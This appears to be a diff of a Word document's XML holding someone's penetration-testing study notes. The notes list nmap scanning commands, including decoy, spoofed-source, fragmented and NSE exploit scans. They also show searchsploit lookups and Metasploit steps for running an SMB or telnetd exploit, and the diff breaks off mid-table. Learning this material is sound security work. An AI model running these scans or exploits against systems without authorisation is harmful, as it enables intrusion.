-              </w:rPr>
-              <w:t>T</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> {IPADDRESS}</w:t>
-            </w:r>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -1837,7 +1693,17 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>man nmap</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> – manual, really helps!</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -1851,25 +1717,7 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t xml:space="preserve">man </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> – manual, really helps!</w:t>
-            </w:r>
-          </w:p>
+          <w:p/>
         </w:tc>
         <w:tc>
           <w:tcPr>
@@ -1883,20 +1731,40 @@
           <w:tcPr>
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:u w:val="single"/>
+              </w:rPr>
+              <w:t>Discovering Target Operating System</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -</w:t>
+            </w:r>
+            <w:r>
+              <w:t>O</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> {ipaddress}</w:t>
+            </w:r>
+          </w:p>
         </w:tc>
         <w:tc>
           <w:tcPr>
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
-          <w:p/>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4945" w:type="dxa"/>
-          </w:tcPr>
           <w:p>
             <w:pPr>
               <w:rPr>
@@ -1911,216 +1779,41 @@
                 <w:bCs/>
                 <w:u w:val="single"/>
               </w:rPr>
-              <w:t>Discovering Target Operating System</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:r>
-              <w:t>O</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="4631" w:type="dxa"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:u w:val="single"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-                <w:u w:val="single"/>
-              </w:rPr>
               <w:t>Detecting service version on port</w:t>
             </w:r>
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -A {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –version-intensity 9 {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-          </w:p>
-          <w:p/>
-          <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:t>Sudo nmap -sV {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Sudo nmap -A {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>Sudo nmap -sV –version-intensity 9 {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>nmap -sn {ipaddress}</w:t>
             </w:r>
             <w:r>
               <w:t>-255</w:t>
@@ -2134,21 +1827,12 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> -p</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>nmap -p</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2169,23 +1853,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>}</w:t>
+              <w:t xml:space="preserve"> {ipaddress}</w:t>
             </w:r>
           </w:p>
           <w:p/>
@@ -2234,29 +1902,8 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -f {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">} </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap -f {ipaddress} </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">– </w:t>
@@ -2308,46 +1955,17 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -D </w:t>
+              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve">RND:5 </w:t>
             </w:r>
             <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>{ipaddress}</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> -sS</w:t>
+            </w:r>
           </w:p>
           <w:p/>
           <w:p/>
@@ -2389,58 +2007,10 @@
           </w:p>
           <w:p>
             <w:r>
-              <w:t>-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -D </w:t>
-            </w:r>
-            <w:r>
-              <w:t>{</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, D {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}, {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+              <w:t xml:space="preserve">-Sudo nmap -D </w:t>
+            </w:r>
+            <w:r>
+              <w:t>{ipaddress}, D {ipaddress}, {ipaddress}, {ipaddress}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2487,29 +2057,8 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -S 8.8.8.8 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Pn</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -e</w:t>
+            <w:r>
+              <w:t>Sudo nmap -S 8.8.8.8 -Pn -e</w:t>
             </w:r>
             <w:r>
               <w:t xml:space="preserve"> eth0</w:t>
@@ -2580,27 +2129,12 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script auth 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t xml:space="preserve">Sudo </w:t>
+            </w:r>
+            <w:r>
+              <w:t>nmap –script auth 192.168.1.75 -sS</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve">   </w:t>
             </w:r>
@@ -2617,35 +2151,14 @@
           </w:p>
           <w:p/>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script </w:t>
             </w:r>
             <w:r>
               <w:t>malware</w:t>
             </w:r>
             <w:r>
-              <w:t xml:space="preserve"> 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
+              <w:t xml:space="preserve"> 192.168.1.75 -sS   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2656,29 +2169,8 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script banner 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script banner 192.168.1.75 -sS   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2687,29 +2179,8 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script exploit 192.168.1.75 -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sS</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve">   </w:t>
+            <w:r>
+              <w:t xml:space="preserve">Sudo nmap –script exploit 192.168.1.75 -sS   </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2734,19 +2205,9 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:t>Sudo nmap</w:t>
+            </w:r>
             <w:r>
               <w:t xml:space="preserve"> –script-help {name}</w:t>
             </w:r>
@@ -2757,32 +2218,11 @@
             <w:tcW w:w="4631" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> –script</w:t>
-            </w:r>
-            <w:r>
-              <w:t xml:space="preserve"> ftp-</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>anon.nse</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 192.168.175</w:t>
+            <w:r>
+              <w:t>Sudo nmap –script</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> ftp-anon.nse 192.168.175</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2818,16 +2258,8 @@
               <w:rPr>
                 <w:highlight w:val="yellow"/>
               </w:rPr>
-              <w:t xml:space="preserve">Manual Vulnerability Analysis and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:highlight w:val="yellow"/>
-              </w:rPr>
-              <w:t>searchploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>Manual Vulnerability Analysis and searchploit</w:t>
+            </w:r>
           </w:p>
         </w:tc>
       </w:tr>
@@ -2849,37 +2281,8 @@
                 <w:numId w:val="5"/>
               </w:numPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>nmap</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> -</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sV</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>ipaddress</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>}</w:t>
+            <w:r>
+              <w:t>Sudo nmap -sV {ipaddress}</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2891,15 +2294,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t>Find version (</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>vsftpd</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> 2.3.)</w:t>
+              <w:t>Find version (vsftpd 2.3.)</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -2911,15 +2306,7 @@
               </w:numPr>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">Google it if </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>theres</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> already existing exploitation</w:t>
+              <w:t>Google it if theres already existing exploitation</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2931,13 +2318,8 @@
             <w:pPr>
               <w:ind w:firstLine="720"/>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>Searchsploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t xml:space="preserve"> {version}</w:t>
+            <w:r>
+              <w:t>Searchsploit {version}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -3129,21 +2511,12 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>Metaploit</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t xml:space="preserve"> Framework Structure</w:t>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Metaploit Framework Structure</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3174,23 +2547,7 @@
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>Cd /</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>usr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:bCs/>
-              </w:rPr>
-              <w:t>/share/Metasploit-framework</w:t>
+              <w:t>Cd /usr/share/Metasploit-framework</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3239,7 +2596,6 @@
             <w:tcW w:w="4945" w:type="dxa"/>
           </w:tcPr>
           <w:p>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
@@ -3247,7 +2603,6 @@
               </w:rPr>
               <w:t>msfconsole</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:t xml:space="preserve"> – </w:t>
             </w:r>
@@ -3323,15 +2678,7 @@
               <w:t>Use exploit/</w:t>
             </w:r>
             <w:r>
-              <w:t>windows/</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>smb</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:t>/ms06_040.netapi</w:t>
+              <w:t>windows/smb/ms06_040.netapi</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -3413,14 +2760,12 @@
             <w:r>
               <w:t xml:space="preserve">CL: show </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>paypload</w:t>
             </w:r>
             <w:r>
               <w:t>s</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:r>
@@ -3511,52 +2856,362 @@
           </w:tcPr>
           <w:p>
             <w:r>
+              <w:t>CL: sudo nmap -sV {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: searchsploit {version}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
               <w:t xml:space="preserve">CL: </w:t>
             </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:t>sudo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
+            <w:r>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ear</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ch {</w:t>
+            </w:r>
+            <w:r>
+              <w:t xml:space="preserve"> version </w:t>
+            </w:r>
+            <w:r>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: use exploit/unix/-&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: show payploads or show options</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: set target {number}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:t>CL: exploit</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4631" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:highlight w:val="yellow"/>
+              </w:rPr>
+              <w:t>Netcat – allow connection to UDP and TCP</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p>
+            <w:r>
+              <w:t>CL: nc -help</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+          <w:p/>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>Telnet</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: Searchsploit Linux tetnetd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: search Linux telnetd</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t>CL: telnet {ipaddress}</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4945" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
